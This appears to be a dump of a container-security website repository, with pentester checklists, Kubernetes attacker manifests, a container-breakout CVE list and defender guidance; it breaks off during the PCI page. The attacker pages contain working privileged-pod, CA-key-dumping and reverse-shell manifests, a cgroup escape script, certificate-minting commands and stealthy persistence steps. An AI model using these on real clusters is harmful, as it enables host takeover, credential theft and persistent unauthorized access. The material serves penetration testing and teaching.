├── CNAME ├── README.md ├── _config.yml ├── _includes └── google-analytics.html ├── attackers ├── attacker_manifests.md ├── compromised_container_checklist.md ├── compromised_user_credentials_checklist.md ├── container_breakout_vulnerabilities.md ├── external_attacker_checklist.md └── kubernetes_persistence_checklist.md ├── defenders ├── PCI_Container_Orchestration_Guidance.md ├── container_image_hardening.md ├── kubernetes_api_security.md └── kubernetes_security_architecture_considerations.md ├── general_information ├── container_cve_list.md ├── container_security_standards.md ├── reading_list.md ├── support_lifecycles.md └── tools_list.md ├── images ├── logo.png └── under_construction.gif ├── jargon_busters ├── container_terms_for_security_people.md └── security_terms_for_container_people.md ├── robots.txt └── security_research ├── index.md └── node_proxy.md /CNAME: -------------------------------------------------------------------------------- 1 | www.container-security.site -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Container Security Site 2 | 3 | This is a site with some container security resources. It is (and probably always will be) a work in progress, but hopefully you'll find some useful information. Issues and PRs welcome [on GitHub](https://github.com/raesene/container-security-site). 4 | 5 | ## General Information 6 | 7 | - [Container Reading List](general_information/reading_list.md) 8 | - [Container Terms for Security people](jargon_busters/container_terms_for_security_people.md) 9 | - [Security Terms for Container people](jargon_busters/security_terms_for_container_people.md) 10 | - [Container CVE List](general_information/container_cve_list.md) 11 | - [Container/Kubernetes Security Tools](general_information/tools_list.md) 12 | - [Container Security Standards](general_information/container_security_standards.md) 13 | - [Container Support Lifecycles](general_information/support_lifecycles.md) 14 | - [Container Security Talks](https://talks.container-security.site) 15 | 16 | ## Container Security Workshop 17 | 18 | - [Slides](https://smarticu5.github.io/talks/Steelcon-Container-Security-Workshop/) 19 | 20 | ## Information for Attackers 21 | 22 | Resources for pentesters/redteamers and people looking to get more information about the offensive side of container security. Methodologies for testing and some tooling information. 23 | 24 | - [External Attacker Checklist](attackers/external_attacker_checklist.md) 25 | - [Compromised Container Checklist](attackers/compromised_container_checklist.md) 26 | - [Compromised User Credentials Checklist](attackers/compromised_user_credentials_checklist.md) 27 | - [Attacker Manifests](attackers/attacker_manifests.md) 28 | - [Container Breakout Vulnerabilities](attackers/container_breakout_vulnerabilities.md) 29 | - [Kubernetes Persistence Checklist](attackers/kubernetes_persistence_checklist.md) 30 | 31 | ## Information for Defenders 32 | 33 | - [PCI Container Orchestration Guidance for Kubernetes](defenders/PCI_Container_Orchestration_Guidance.md) 34 | - [Kubernetes Security Architecture Considerations](defenders/kubernetes_security_architecture_considerations.md) 35 | - [Kubernetes RBAC Good Practice](https://kubernetes.io/docs/concepts/security/rbac-good-practices/) - This docs page gives guidance on avoiding common Kubernetes RBAC pitfalls. 36 | - [Kubernetes API Server Bypass Risks](https://kubernetes.io/docs/concepts/security/api-server-bypass-risks/) - This docs page shows places where it may be possible to bypass the Kubernetes API server, an important point as many security controls are focused on the API server. 37 | 38 | ## Security Research 39 | 40 | Content that relates to container security but doesn't neatly fit in to attacker/defender buckets 41 | 42 | - [Node/Proxy Rights in Kubernetes](security_research/node_proxy.md) 43 | 44 | 45 | 46 | ## Questions? 47 | 48 | you can find me on Mastodon 49 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | remote_theme: pmarsceill/just-the-docs 2 | plugins: 3 | - jekyll-feed 4 | title: [container-security site] 5 | description: [A site about container security] 6 | logo: "images/logo.png" 7 | ga_tracking: G-CRQ9HG0N7J 8 | aux_links: 9 | "Edit on GitHub": 10 | - "https://github.com/raesene/container-security-site" 11 | -------------------------------------------------------------------------------- /_includes/google-analytics.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /attackers/attacker_manifests.md: -------------------------------------------------------------------------------- 1 | # Attacker Manifests 2 | 3 | These are Kubernetes manifests that could be useful on security assessments, or pentests. 4 | 5 | N.B. for pentesters, make sure you have delete rights to the objects you create and make sure to clean up when you're done! 6 | 7 | ## General form 8 | 9 | * `kubectl create -f [MANIFEST.YAML]` creates object contained in a file called [MANIFEST.YAML] 10 | * `kubectl delete -f [MANIFEST.YAML]` deletes object contained in a file called [MANIFEST.YAML] 11 | 12 | if you want to create the objects in a specific namespace that isn't your current active one add the following to your manifest under metadata 13 | 14 | ```yaml 15 | namespace: [NAMESPACENAME] 16 | ``` 17 | 18 | ## Root Pod 19 | 20 | This manifest will create a privileged pod on a node in the cluster. Once it's running `kubectl exec -it noderootpod chroot /host` should give you a root shell on the node. 21 | 22 | This won't work if :- 23 | 24 | 1. You don't have right to create pods in the namespace. You'll also need rights to pod/exec in order to get the shell in the pod afterwards. 25 | 2. The node can't pull images from Docker Hub 26 | 3. There's PodSecurityPolicies (or equivalent) blocking the creation of privileged pods 27 | 28 | ```yaml 29 | apiVersion: v1 30 | kind: Pod 31 | metadata: 32 | name: noderootpod 33 | labels: 34 | spec: 35 | tolerations: 36 | - key: node-role.kubernetes.io/master 37 | effect: NoSchedule 38 | hostNetwork: true 39 | hostPID: true 40 | hostIPC: true 41 | containers: 42 | - name: noderootpod 43 | image: busybox 44 | securityContext: 45 | privileged: true 46 | volumeMounts: 47 | - mountPath: /host 48 | name: noderoot 49 | command: [ "/bin/sh", "-c", "--" ] 50 | args: [ "while true; do sleep 30; done;" ] 51 | volumes: 52 | - name: noderoot 53 | hostPath: 54 | path: / 55 | ``` 56 | 57 | ## Root daemonset 58 | 59 | This manifest does the same thing as the pod one, except it creates a pod on every cluster node (including control plane nodes in un-managed clusters). Once it's running, get a list of pods in the daemonset with `kubectl get daemonset noderootdaemon` then use kubectl exec (as above) to execute the `chroot /host` command in one of the pods 60 | 61 | This won't work if :- 62 | 63 | 1. You don't have right to create daemonsets in the namespace. You'll also need rights to pod/exec to get the shell afterwards. 64 | 2. The node can't pull images from Docker Hub 65 | 3. There's PodSecurityPolicies (or equivalent) blocking the creation of privileged pods by the replicaset controller in that namespace. 66 | 67 | 68 | ```yaml 69 | apiVersion: apps/v1 70 | kind: DaemonSet 71 | metadata: 72 | name: noderootdaemon 73 | labels: 74 | spec: 75 | selector: 76 | matchLabels: 77 | name: noderootdaemon 78 | template: 79 | metadata: 80 | labels: 81 | name: noderootdaemon 82 | spec: 83 | tolerations: 84 | - key: node-role.kubernetes.io/master 85 | effect: NoSchedule 86 | hostNetwork: true 87 | hostPID: true 88 | hostIPC: true 89 | containers: 90 | - name: noderootpod 91 | image: busybox 92 | securityContext: 93 | privileged: true 94 | volumeMounts: 95 | - mountPath: /host 96 | name: noderoot 97 | command: [ "/bin/sh", "-c", "--" ] 98 | args: [ "while true; do sleep 30; done;" ] 99 | volumes: 100 | - name: noderoot 101 | hostPath: 102 | path: / 103 | ``` 104 | 105 | ## Sensitive file logger 106 | 107 | In a scenario where you have create pods and access to pod logs (a right commonly given for diagnostics) but don't have pod/exec, it can still be possible to use your rights to escalate access to a cluster, by creating a pod which cat's a file to STDOUT (as this will be logged in the container logs) 108 | 109 | The manifest below is an example of this. It would work on a kubeadm cluster, when deployed to a master node. To adapt to other scenarios, just change the volume mount and file in the `command` parameter 110 | 111 | ```yaml 112 | apiVersion: v1 113 | kind: Pod 114 | metadata: 115 | name: keydumper-pod 116 | labels: 117 | app: keydumper 118 | spec: 119 | tolerations: 120 | - key: node-role.kubernetes.io/master 121 | effect: NoSchedule 122 | containers: 123 | - name: keydumper-pod 124 | image: busybox 125 | volumeMounts: 126 | - mountPath: /pki 127 | name: keyvolume 128 | command: ['cat', '/pki/ca.key'] 129 | volumes: 130 | - name: keyvolume 131 | hostPath: 132 | path: /etc/kubernetes/pki 133 | type: Directory 134 | ``` 135 | 136 | ## Reverse Shell 137 | 138 | For setups where you only have create pod, but don't have access to pod/exec or pod logs, it's often possible to setup a reverse shell. First setup an ncat listener with something like 139 | 140 | ```bash 141 | ncat -l -p 8989 142 | ``` 143 | 144 | Then use the manifest below. Replace `[IP]` with the IP address of the host with the ncat listener. 145 | 146 | ```yaml 147 | apiVersion: v1 148 | kind: Pod 149 | metadata: 150 | name: ncat-reverse-shell-pod 151 | spec: 152 | tolerations: 153 | - key: node-role.kubernetes.io/master 154 | effect: NoSchedule 155 | containers: 156 | - name: ncat-reverse-shell 157 | image: raesene/ncat 158 | volumeMounts: 159 | - mountPath: /host 160 | name: hostvolume 161 | args: ['[IP]', '8989', '-e', '/bin/bash'] 162 | volumes: 163 | - name: hostvolume 164 | hostPath: 165 | path: / 166 | type: Directory 167 | ``` 168 | -------------------------------------------------------------------------------- /attackers/compromised_container_checklist.md: -------------------------------------------------------------------------------- 1 | # Attackers - Compromised Container Checklist 2 | 3 | A list of things you can try if you're doing a CTF/Pentest/Bug bounty and find yourself in a container. 4 | 5 | ## Confirming you're in a container. 6 | 7 | ### Docker 8 | 9 | - `ls -al /.dockerenv` - If this file exists, it's a strong indication you're in a container 10 | - `ps -ef` - Not a definitive tell, but if there are no hardware management processes, it's a fair bet you're in a container 11 | - `ip addr` - Again not definitive, but `172.17.0.0/16` is the default docker network, so if all you have is network stats, this is useful 12 | - `ping host.docker.internal` - should respond if you're in a docker container 13 | 14 | ### Tools for checking 15 | 16 | - Run [amicontained](https://github.com/genuinetools/amicontained) 17 | 18 | ## Breaking out 19 | 20 | ### High level areas 21 | 22 | - File mounts. What information can you see from the host 23 | - Granted Capabilities. Do you have extra rights 24 | - Kernel version. Is it a really old kernel which has known exploits. 25 | 26 | ### Tooling 27 | 28 | [tools list here](../general_information/tools_list.md) 29 | 30 | ### Manual breakout - privileged containers 31 | 32 | If you find out from amicontained or similar that you are in a privileged container, some ways to breakout 33 | 34 | From [this tweet](https://twitter.com/_fel1x/status/1151487051986087936) this is a shell script which runs commands on the underlying host from a privileged container. 35 | 36 | ```bash 37 | d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` 38 | mkdir -p $d/w;echo 1 >$d/w/notify_on_release 39 | t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` 40 | touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh 41 | $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o 42 | ``` 43 | 44 | save it as `escape.sh` and you can use it like 45 | 46 | ```bash 47 | ./escape.sh ps -ef 48 | ``` 49 | 50 | Another approach for privileged containers is just to mount the underlying root filesystem. Run the `mount` command to get a list of filesystems. Usually files like `/etc/resolv.conf` are mounted off the underlying node disk, so just find that disk and mount the entire thing under something like `/host` and it'll provide edit access to the node filesystem 51 | 52 | ### Manual breakout - Access to the Docker socket 53 | 54 | If the tooling suggests that the Docker socket is available at `/var/run/docker.sock` then you can just get the docker CLI tool and run any docker command. To breakout use :- 55 | 56 | * `docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host` - From [this](https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/) post. This will drop you into a root shell on the host. 57 | 58 | ## Other Avenues of attack 59 | 60 | Avenues of attack that aren't directly related to breaking out of the container 61 | 62 | ### keyctl-unmask 63 | 64 | As described in [this post](https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/) it may be possible to get keys from the kernel keyring on a Docker host, and use those for breakouts or other access to the host or related machines. 65 | 66 | -------------------------------------------------------------------------------- /attackers/compromised_user_credentials_checklist.md: -------------------------------------------------------------------------------- 1 | # Attackers - Compromised User Credential Checklist 2 | 3 | This could apply where you have access to a container with a service token mounted, or have got access to a set of user credentials for a cluster. 4 | 5 | ## What rights do you have? 6 | 7 | The first place to start is to see what access you've got. You can do this with just `kubectl` . `kubectl auth can-i --list` will list all the permissions the currently configured user has, you can also use `rakkess` to achieve the same result 8 | 9 | ## Escalating privileges 10 | 11 | Depending on what rights your user has, there are a number of possible routes for privilege escalation :- 12 | 13 | ### Create Daemonset (and exec into container) 14 | 15 | If you have create daemonset rights (and there aren't any Pod Security Policies or similar in place) and also pod/exec rights, getting cluster-admin is pretty easy in an unmanaged cluster, and possible in a managed cluster depending on the configuration. Create an instance of the [root daemonset](attacker_manifests.md) and then for each created pod you can exec into a root shell on the node. Once you find a shell on a control plane node, the easiest way to get cluster admin is either to get a pre-created cluster-admin certificate (in `kubeadm` clusters this is located at `/etc/kubernetes/admin.conf`) or to mint a new certificate with a group membership of `system:masters`. Assuming the the certificate authority files are held in `/etc/kubernetes/pki` the following commands can be used to create a user certificate :- 16 | 17 | * `openssl genrsa -out user1.key 2048` 18 | * `openssl req -new -key user1.key -out user1.csr -subj "/CN=user1/O=system:masters"` 19 | * `openssl x509 -req -in user1.csr -CA /etc/kubernetes/pki/ca.crt -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial -out user1.crt` 20 | 21 | In a managed cluster, the above procedure won't work, as you don't have shell access to the control plane nodes. For this, one approach would be to get your daemonset, exec a root shell into each node, and then use CRI level commands (so `docker` where it's in use or `crictl` for other environments) to examine each container running on the node and take copies of the service account files looking for a high privileged token to use. 22 | 23 | 24 | ### Create Pod (and exec into container) 25 | **You can try out this attack using Kube Security Lab, using the ssh-to-create-pods-multi-node playbook [here](https://github.com/raesene/kube_security_lab)** 26 | 27 | The approach here is relatively similar to the daemonset, except that you'll need to target your pod at a control plane node and ensure you tolerate the `NoSchedule` taint that's likely to be set there. 28 | 29 | 1. Use `kubectl get nodes` to get a list of nodes (you need list on node resources for this) 30 | 2. Modify the [root pod manifest](./attacker_manifests.md) with a `NodeName` field in the spec as described [here](https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#nodename) 31 | 3. create the pod and then exec into it. -------------------------------------------------------------------------------- /attackers/container_breakout_vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # Container Breakout Vulnerabilities 2 | 3 | A list of CVEs in the various parts of the container stack that could allow for unauthorised access to host resources (e.g. filesystem, network stack) from a container. 4 | 5 | With Linux issues it can be a bit tricky to say if they're container escapes or not so generally looking at ones where container escape has been demonstrated. 6 | 7 | 8 | ## Linux CVEs 9 | 10 | - [CVE-2022-0847](https://dirtypipe.cm4all.com/) - a.k.a DirtyPipe. Vulnerability allows for overwrite of files that should be read-only. Basic container information [here](https://blog.aquasec.com/cve-2022-0847-dirty-pipe-linux-vulnerability), full container breakout PoC writeup [here](https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/) and code [here](https://github.com/DataDog/dirtypipe-container-breakout-poc) 11 | - [CVE-2022-0492](https://access.redhat.com/security/cve/cve-2022-0492). Vulnerability in cgroup handling can allow for container breakout depending on isolation layers in place. Container breakout details [here](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/) 12 | - [CVE-2022-0185](https://www.willsroot.io/2022/01/cve-2022-0185.html) - Local privilege escalation, needs CAP_SYS_ADMIN either at the host level or in a user namespace 13 | - [CVE-2021-3490](https://www.crowdstrike.com/blog/exploiting-cve-2021-3490-for-container-escapes/) - Vulnerability in the eBPF subsystem allows for container breakout if the container has CAP_BPF (see also [proof of concept](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)) 14 | - [CVE-2021-31440](https://www.zerodayinitiative.com/blog/2021/5/26/cve-2021-31440-an-incorrect-bounds-calculation-in-the-linux-kernel-ebpf-verifier) - eBPF incorrect bounds calculation allows for privesc. 15 | - [CVE-2021-22555](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html) - Linux LPE used to break out of Kubernetes pod by the researcher 16 | - [CVE-2017-1000112](https://capsule8.com/blog/practical-container-escape-exercise/) - memory corruption in UFO packets. 17 | - [CVE-2016-5195](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5195) - (a.k.a 'dirty CoW') - race condition leading to incorrect handling of Copy on Write. 18 | - [CVE-2017-5123](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123) - vulnerability in the WaitID syscall. 19 | 20 | ## runc CVEs 21 | 22 | - [CVE-2024-21626](https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/) - a.k.a. Leaky Vessels, allows for container escape if running a malicious image, or building a malicious Dockerfile, directly, or indirectly (i.e. through a `FROM` instruction). 23 | - [CVE-2021-30465](http://blog.champtar.fr/runc-symlink-CVE-2021-30465/) - race condition when mounting volumes into a container allows for host access. 24 | - [CVE-2019-19921](https://nvd.nist.gov/vuln/detail/CVE-2019-19921) - TOCTOU in runC's mount operations that allows to break out of the container. 25 | - [CVE-2019-5736](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) - overwrite runc binary on the host system at container start, see also [explanation](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) 26 | - [CVE-2016-9962](https://bugzilla.suse.com/show_bug.cgi?id=1012568#c2) - access to a host file descriptor allows for breakout. 27 | 28 | ## Containerd CVEs 29 | - [CVE-2022-23648](https://bugs.chromium.org/p/project-zero/issues/detail?id=2244) - Vuln in volume mounting allows for arbitrary file read from the underlying host, leading to likely indirect container breakout. PoC exploit [here](https://github.com/raesene/CVE-2022-23648-POC) 30 | 31 | ## CRI-O CVEs 32 | 33 | - [CVE-2022-0811](https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/) - Vulnerability in setting sysctls in k8s/OpenShift manifests allows for container breakout. Linked post has full PoC details. 34 | - [CVE-2019-14891](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14891) allows containers to access the host's network 35 | 36 | ## Docker CVEs 37 | 38 | - [CVE-2024-23653](https://snyk.io/blog/cve-2024-23653-buildkit-grpc-securitymode-privilege-check/) - missing privilege check in Docker BuildKit allowing for container escape when building an image using a malicious Dockerfile or upstream image (i.e. when using FROM) 39 | - [CVE-2024-23651](https://snyk.io/blog/cve-2024-23651-docker-buildkit-mount-cache-race/) - race condition in Docker BuildKit allowing for container escape when building an image using a malicious Dockerfile or upstream image (i.e. when using FROM) 40 | - [CVE-2021-21284](https://github.com/moby/moby/security/advisories/GHSA-7452-xqpj-6rpc) - When using user namespaces, a user with some access to the host filesystem can modify files which they should not have access to. 41 | - [CVE-2019-14271](https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/) - An issue in the implementation of the Docker "cp" command can lead to full container escape when exploited by an attacker 42 | 43 | ## Kubernetes CVES 44 | - [CVE-2021-25741](https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s) - race condition in when using hostPath volumes allows for privileged access to host filesystem 45 | - [CVE-2021-25737](https://groups.google.com/g/kubernetes-security-announce/c/xAiN3924thY) - unauthorized access to host network stack by using endpoint slices 46 | - [CVE-2017-1002101](https://github.com/kubernetes/kubernetes/issues/60813) - subpath volume mount handling allows arbitrary file access in host filesystem 47 | - [CVE-2017-1002102](https://github.com/kubernetes/kubernetes/issues/60814) - Arbitrary deletion of files on the host possible when using some Kubernetes volume types 48 | 49 | ## Cloud provider tooling 50 | 51 | - [CVE-2021-3100, CVE-2021-3101, CVE-2022-0070, CVE-2022-0071](https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/) AWS' hot patch package for log4shell allowed for container escape, if a container contains a malicious "java" executable which will be run uncontainerized. 52 | 53 | ## Additional resources related to escaping containers 54 | 55 | - [Cross Container Attacks: The Bewildered eBPF on Clouds (2023)](https://www.usenix.org/system/files/usenixsecurity23-he.pdf) describes how the `CAP_BPF+CAP_PERFMON` 56 | (or `CAP_SYS_ADMIN`) capabilities be abused to escape containers. 57 | - [Towards Improving Container Security by Preventing Runtime Escapes (2021)](https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=9652631) analyzes 59 CVEs for 11 container runtimes 58 | - [Bad Pods: Kubernetes Pod Privilege Escalation](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation) describes common scenarios of dangerous Kubernetes pod configurations, and how/if it's possible to escape in each case. 59 | 60 | ## Reference Links 61 | 62 | - [Linux Kernel Exploitation](https://github.com/xairy/linux-kernel-exploitation/blob/master/README.md) - Extensive maintained list of links relating to Linux Kernel Exploitation 63 | - [Hacking Kubernetes](https://hacking-kubernetes.info/) - Hacking Kubernetes book site has a set of Container Breakout CVEs 64 | -------------------------------------------------------------------------------- /attackers/external_attacker_checklist.md: -------------------------------------------------------------------------------- 1 | # Attackers - External Checklist 2 | 3 | External attackers are typically looking for listening services. The list below is likely container related service ports and notes on testing/attacking them. 4 | 5 | ## 2375/TCP - Docker 6 | 7 | This is the default insecure Docker port. It's an HTTP REST API, and usually access results in root on the host. 8 | 9 | ### Testing with Docker CLI 10 | 11 | The easiest way to attack this is just use the docker CLI. 12 | 13 | * `docker run -H tcp://[IP]:2375 info` - This will confirm access and return some information about the host 14 | * `docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host` - From [this](https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/) post. This will drop you into a root shell on the host. 15 | 16 | --- 17 | 18 | ## 2376/TCP - Docker 19 | 20 | This is the default port for the Docker daemon where it requires credentials (client certificate), so you're unlikely to get far without that. If you do have the certificate and key for access :- 21 | 22 | * `docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=[IP]:2376 info` - format for the info command to confirm access. 23 | * `docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=[IP]:2376 run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host` - root on the host 24 | 25 | --- 26 | 27 | ## 443/TCP, 6443/TCP, 8443/TCP - Kubernetes API server 28 | 29 | Typical ports for the Kubernetes API server. 30 | 31 | ### Testing for access 32 | 33 | Access to the `/version` endpoint will often work without valid credentials (using curl), as this is made available to unauthenticated users. 34 | 35 | * `kubectl --insecure-skip-tls-verify --username=system:unauthenticated -shttps://[IP]:[PORT] version` - Test for access with kubectl 36 | * `curl -k https://[IP]:[PORT]/version` - Test for access with curl 37 | 38 | ### Checking permissions 39 | 40 | It's possible that unauthenticated users have been provided more access. You can check what permissions you have with 41 | 42 | * `kubectl --insecure-skip-tls-verify --username=system:unauthenticated -shttps://[IP]:[PORT] auth can-i --list` 43 | 44 | ### Getting privileged access to cluster nodes 45 | 46 | In the event that you have create pods access without authentication, see [attacker manifests](attacker_manifests.md) for useful approaches. 47 | 48 | --- 49 | 50 | ## 2379/TCP - etcd 51 | 52 | The authentication model used by etcd, when supporting a Kubernetes cluster, is relatively straightforward. It uses client certificate authentication where **any** certificate issued by it's trusted CA will provide full access to all data. In terms of attacks, there are two options unauthenticated access and authenticated acces. 53 | 54 | ### Unauthenticated Access 55 | **You can try out this attack using Kube Security Lab, using the etcd-noauth.yml playbook [here](https://github.com/raesene/kube_security_lab)** 56 | 57 | A good general test for this is to use curl to access the `/version` endpoint. Although most endpoints don't respond well to curl in etcdv3, this one will and it'll tell you whether unauthenticated access is possible or not. 58 | 59 | ```bash 60 | curl [IP]:2379/version 61 | ``` 62 | 63 | If that returns version information, it's likely you can get unauthenticated access to the database. A good first step is to drop all the keys in the database, using etcdctl. First you need to set this environment variable so that etcdctl knows it's talking to a v3 server. 64 | 65 | ```bash 66 | export ETCDCTL_API=3 67 | ``` 68 | 69 | Then this command will enumerate all the keys in the database 70 | 71 | ```bash 72 | etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get / --prefix --keys-only 73 | ``` 74 | 75 | with a list of keys to hand the next step is generally to find useful information, for further attacks. 76 | 77 | --- 78 | 79 | ## 5000/TCP - Docker Registry 80 | 81 | Generally the goal of attacking a Docker registry is not to compromise the service itself, but to gain access to either read sensitive information stored in container images and/or modify stored container images. 82 | 83 | ### Enumerating repositories/images 84 | 85 | Whilst you can do this with just curl, it's probably more efficient to use some of the [registry interaction tools](tools_list.md#container-registry-tooling). For example `go-pillage-reg` will dump a list of the repositories in a a registry as well as the details of all the manifests of those images. 86 | 87 | 88 | --- 89 | 90 | ## 10250/TCP - kubelet 91 | **You can try out this attack using Kube Security Lab, using the rwkubelet-noauth.yml playbook [here](https://github.com/raesene/kube_security_lab)** 92 | 93 | The main kubelet port will generally be present on all worker nodes, and *may* be present on control plane nodes, if the control plane components are deployed as containers (e.g. with kubeadm). Usually authentication to this port is via client certificates and there's usually no authorization in place. 94 | 95 | Trying the following request should either give a 401 (showing that a valid client certificate is required) or return some JSON metrics information (showing you have access to the kubelet port) 96 | 97 | ```bash 98 | curl -k https://[IP]:10250/metrics 99 | ``` 100 | 101 | Assuming you've got access you can then execute commands in any container running on that host. As the kubelet controls the CRI (e.g. Docker) it's typically going to provide privileged access to all the containers on the host. 102 | 103 | The easiest way to do this is to use Cyberark's [kubeletctl](https://github.com/cyberark/kubeletctl). First scan the host to show which pods can have commands executed in them 104 | 105 | ```bash 106 | kubeletctl scan rce --server [IP] 107 | ``` 108 | 109 | Then you can use this command to execute commands in one or more of the vulnerable pods. just replace `whoami` with the command of your choice and fill in the details of the target pod, based on the information returned from the scan command 110 | 111 | ```bash 112 | kubeletctl run "whoami" --namespace [NAMESPACE] --pod [POD] --container [CONTAINER] --server [IP] 113 | ``` 114 | 115 | If you don't have `kubeletctl` available but do have `curl` you can use it to do the same thing. First get the pod listing 116 | 117 | ```bash 118 | curl -k https://[IP]:10250/pods/ | jq 119 | ``` 120 | 121 | From that pull out the namespace, pod name and container name that you want to run a command in, then issue this command filling in the blanks appropriately 122 | 123 | ```bash 124 | https://[IP]:10250/run/[Namespace]/[Pod]/[Container] -k -XPOST -d "cmd=[COMMAND]" 125 | ``` 126 | 127 | --- 128 | 129 | ## 10255/TCP - kubelet read-only 130 | 131 | The kubelet read-only port is generally only seen on older clusters, but can provide some useful information disclosure if present. It's an HTTP API which will have no encryption and no authentication requirements on it, so it's easy to interact with. 132 | 133 | The most useful endpoint will be `/pods/` so retrieving it using curl (as below) and looking at the output for useful information, is likely to be the best approach. 134 | 135 | 136 | ```bash 137 | curl http://[IP]:10255/pods/ | jq 138 | ``` -------------------------------------------------------------------------------- /attackers/kubernetes_persistence_checklist.md: -------------------------------------------------------------------------------- 1 | # Kubernetes persistence checklist 2 | 3 | Once you've got access to a cluster, if part of the review includes checking for persistence, there are some ways in Kubernetes to do that. Essentially there are three options for persistence 4 | 5 | 1. Service Account Secrets. In Kubernetes < 1.24, all service accounts in the cluster have an associated secret (which is a JWT token) which do not expire. If you have access to secrets, especially in the `kube-system` namespace, you can take a copy of the secret and use it to authenticate to the cluster indefinitely. 6 | - First check permissions using `kubectl auth can-i get secrets -n kube-system` this will let you know if you have acesss. 7 | - Then if you have access, just run `kubectl get secrets -n kube-system -o yaml` and copy the secret you want. The `token` field is the JWT token. 8 | - You can then use the token with `kubectl -s [SERVER] --token [TOKEN] [COMMAND]` to authenticate to the cluster. Take care that there is not a kubeconfig file in the home directory of the user you are running this as, as it will take precedence over the command line supplied token. 9 | 2. CSR API. If you have access to the Certificate Signing Request API, you can use it to mint new client ceritificates for the cluster, which will give you persistent access to the cluster. To do this you'll ideally need `update` on `certificatesigningrequests/approval` resources, but TBH you're likely to get that through having a `cluster-admin` level account. 10 | - First check permissions using `kubectl auth can-i update certificatesigningrequests/approval` this will let you know if you have acesss. 11 | - Next you need a good username to use for the cert. likely the best generic one would be `system:kube-controller-manager` as it has a lot of permissions generally and the activity from it looks like generic system activity so might not be noticed by the blue team. 12 | - With this you could manually create and approve a CSR, but it's easier to to it with [teisteanas](https://github.com/raesene/teisteanas). Just run `teisteanas -username system:kube-controller-manager -output-file controller.kubeconfig` which will create a new kubeconfig with a client certificate with that username, it should also tell you how long it'll be valid for (the default is 12 months) 13 | - now to check access just do `kubectl --kubeconfig controller.kubeconfig auth can-i --list` and you'll see a list of rights including `get` secrets at the cluster level, so that should be good for persistence. 14 | 3. TokenRequest API. This one hit release in Kubernetes 1.22, so will work on more modern versions. It was also beta before that so this technique might work with some tweaking but you can generally use the secret version there, so no need :) 15 | - First check permissions using `kubectl auth can-i create serviceaccounts/token -n kube-system` this will let you know if you have acesss. 16 | - Second you need a system service account with good rights. `persistent-volume-binder` is a good one that will exist in most clusters. it has `get` on secrets at a cluster level and also the ability to create new pods, amongst other things. 17 | - Again you can do this next bit manually but [tòcan](https://github.com/raesene/tocan) can make it easier. `tocan -service-account persistent-volume-binder -output-file pvb.kubeconfig -namespace kube-system -expiration-seconds 31536000` will create a new kubeconfig file from that service account using a token which should last for a year. Be aware that some managed k8s versions limit token lifetime (e.g. EKS and GKE), so this would be less useful then. 18 | - then check permissions with `kubectl --kubeconfig pvb.kubeconfig auth can-i --list` -------------------------------------------------------------------------------- /defenders/PCI_Container_Orchestration_Guidance.md: -------------------------------------------------------------------------------- 1 | # PCI Container Orchestration Guidance for Kubernetes 2 | 3 | In September 2022 the PCI council released [Guidance for Containers and Container Orchestration Tools](https://blog.pcisecuritystandards.org/new-information-supplement-guidance-for-containers-and-container-orchestration-tools) which is intended to help organizations who use tools like Docker and Kubernetes in payment systems, do so in a secure fashion. The guidance should also be useful as a general guide to Kubernetes security hardening. 4 | 5 | One of the key parts of the document is a table of risks and best practices which span 16 areas. 6 | 7 | The guidance is fairly generic, so to help apply this specifically to Kubernetes I've been writing a series of blogs to look at each of these areas. This page provides a handy index for those posts. As this guidance will be used by assessors as well, I made some notes on the [challenges of doing security assessments on Kubernetes](https://raesene.github.io/blog/2022/09/20/Assessing-Kubernetes-Clusters-for-PCI-Compliance/). 8 | 9 | - [Authentication](https://raesene.github.io/blog/2022/10/01/PCI-Kubernetes-Section1-Authentication/) 10 | - [Authorization](https://raesene.github.io/blog/2022/10/08/PCI-Kubernetes-Section2-Authorization/) 11 | - [Workload Security](https://raesene.github.io/blog/2022/10/15/PCI-Kubernetes-Section3-workload-security/) 12 | - [Network Security](https://raesene.github.io/blog/2022/10/23/PCI-Kubernetes-Section4-network-security/) 13 | - 